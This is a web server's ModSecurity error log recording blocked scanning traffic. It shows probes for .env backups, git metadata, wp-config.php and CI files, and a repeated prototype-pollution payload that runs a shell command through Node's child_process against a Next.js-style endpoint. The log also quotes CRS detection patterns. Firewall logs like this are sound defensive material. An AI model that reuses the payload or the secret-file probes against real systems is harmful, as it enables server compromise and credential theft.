[Thu Dec 11 07:55:07.600402 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTpqy0kNhNGbVrfHEmhHjgAAAAI"]
[Thu Dec 11 07:55:07.600566 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTpqy0kNhNGbVrfHEmhHjgAAAAI"]
[Thu Dec 11 07:55:07.600789 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTpqy0kNhNGbVrfHEmhHjgAAAAI"]
[Thu Dec 11 07:55:07.601011 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTpqy0kNhNGbVrfHEmhHjgAAAAI"]
[Thu Dec 11 07:55:07.820948 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTpqy0kNhNGbVrfHEmhHjwAAAAI"]
[Thu Dec 11 07:55:07.821170 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTpqy0kNhNGbVrfHEmhHjwAAAAI"]
[Thu Dec 11 07:55:07.821391 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTpqy0kNhNGbVrfHEmhHjwAAAAI"]
[Thu Dec 11 07:55:08.116218 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTpqzEkNhNGbVrfHEmhHkAAAAAI"]
[Thu Dec 11 07:55:08.116539 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTpqzEkNhNGbVrfHEmhHkAAAAAI"]
[Thu Dec 11 07:55:08.116805 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTpqzEkNhNGbVrfHEmhHkAAAAAI"]
[Thu Dec 11 07:55:08.253829 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTpqzEkNhNGbVrfHEmhHkQAAAAI"]
[Thu Dec 11 07:55:08.254065 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTpqzEkNhNGbVrfHEmhHkQAAAAI"]
[Thu Dec 11 07:55:08.254270 2025] [:error] [pid 660795] [client 195.178.110.201:15682] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTpqzEkNhNGbVrfHEmhHkQAAAAI"]
[Thu Dec 11 13:44:03.753645 2025] [:error] [pid 664040] [client 3.124.12.43:33562] [client 3.124.12.43] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTq8k0f2y7b6ZcvHxt40JgAAAAs"]
[Thu Dec 11 13:44:03.754154 2025] [:error] [pid 664040] [client 3.124.12.43:33562] [client 3.124.12.43] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTq8k0f2y7b6ZcvHxt40JgAAAAs"]
[Thu Dec 11 13:44:03.755174 2025] [:error] [pid 664040] [client 3.124.12.43:33562] [client 3.124.12.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTq8k0f2y7b6ZcvHxt40JgAAAAs"]
[Thu Dec 11 13:44:03.755396 2025] [:error] [pid 664040] [client 3.124.12.43:33562] [client 3.124.12.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/apps"] [unique_id "aTq8k0f2y7b6ZcvHxt40JgAAAAs"]
[Thu Dec 11 15:13:41.370932 2025] [:error] [pid 664732] [client 185.177.72.10:41648] [client 185.177.72.10] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrRlZQEhEGZOAeDW67SVwAAAAk"]
[Thu Dec 11 15:13:41.371210 2025] [:error] [pid 664732] [client 185.177.72.10:41648] [client 185.177.72.10] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrRlZQEhEGZOAeDW67SVwAAAAk"]
[Thu Dec 11 15:13:41.371417 2025] [:error] [pid 664732] [client 185.177.72.10:41648] [client 185.177.72.10] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrRlZQEhEGZOAeDW67SVwAAAAk"]
[Thu Dec 11 17:25:47.683960 2025] [:error] [pid 662183] [client 104.236.109.223:34960] [client 104.236.109.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrwiyj3kiV1jR7nMtPH8wAAAAc"]
[Thu Dec 11 17:25:47.684344 2025] [:error] [pid 662183] [client 104.236.109.223:34960] [client 104.236.109.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrwiyj3kiV1jR7nMtPH8wAAAAc"]
[Thu Dec 11 17:25:47.684680 2025] [:error] [pid 662183] [client 104.236.109.223:34960] [client 104.236.109.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTrwiyj3kiV1jR7nMtPH8wAAAAc"]
[Thu Dec 11 20:08:56.763181 2025] [:error] [pid 664749] [client 195.178.110.223:60070] [client 195.178.110.223] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTsWyKEaLL5b8yZjdF_UWQAAAAI"]
[Thu Dec 11 20:08:56.763556 2025] [:error] [pid 664749] [client 195.178.110.223:60070] [client 195.178.110.223] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTsWyKEaLL5b8yZjdF_UWQAAAAI"]
[Thu Dec 11 20:08:56.763734 2025] [:error] [pid 664749] [client 195.178.110.223:60070] [client 195.178.110.223] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTsWyKEaLL5b8yZjdF_UWQAAAAI"]
[Thu Dec 11 23:47:28.833175 2025] [:error] [pid 660797] [client 54.170.3.213:52098] [client 54.170.3.213] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtKAHVFfM0aT6sFbU4vngAAAAQ"]
[Thu Dec 11 23:47:28.833644 2025] [:error] [pid 660797] [client 54.170.3.213:52098] [client 54.170.3.213] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtKAHVFfM0aT6sFbU4vngAAAAQ"]
[Thu Dec 11 23:47:28.834629 2025] [:error] [pid 660797] [client 54.170.3.213:52098] [client 54.170.3.213] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtKAHVFfM0aT6sFbU4vngAAAAQ"]
[Thu Dec 11 23:47:28.834806 2025] [:error] [pid 660797] [client 54.170.3.213:52098] [client 54.170.3.213] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtKAHVFfM0aT6sFbU4vngAAAAQ"]
[Fri Dec 12 00:40:17.377540 2025] [:error] [pid 678591] [client 18.201.77.213:60684] [client 18.201.77.213] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtWYbEz7zcaAri_juZQDwAAAAc"]
[Fri Dec 12 00:40:17.378026 2025] [:error] [pid 678591] [client 18.201.77.213:60684] [client 18.201.77.213] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtWYbEz7zcaAri_juZQDwAAAAc"]
[Fri Dec 12 00:40:17.379015 2025] [:error] [pid 678591] [client 18.201.77.213:60684] [client 18.201.77.213] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtWYbEz7zcaAri_juZQDwAAAAc"]
[Fri Dec 12 00:40:17.379222 2025] [:error] [pid 678591] [client 18.201.77.213:60684] [client 18.201.77.213] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps"] [unique_id "aTtWYbEz7zcaAri_juZQDwAAAAc"]
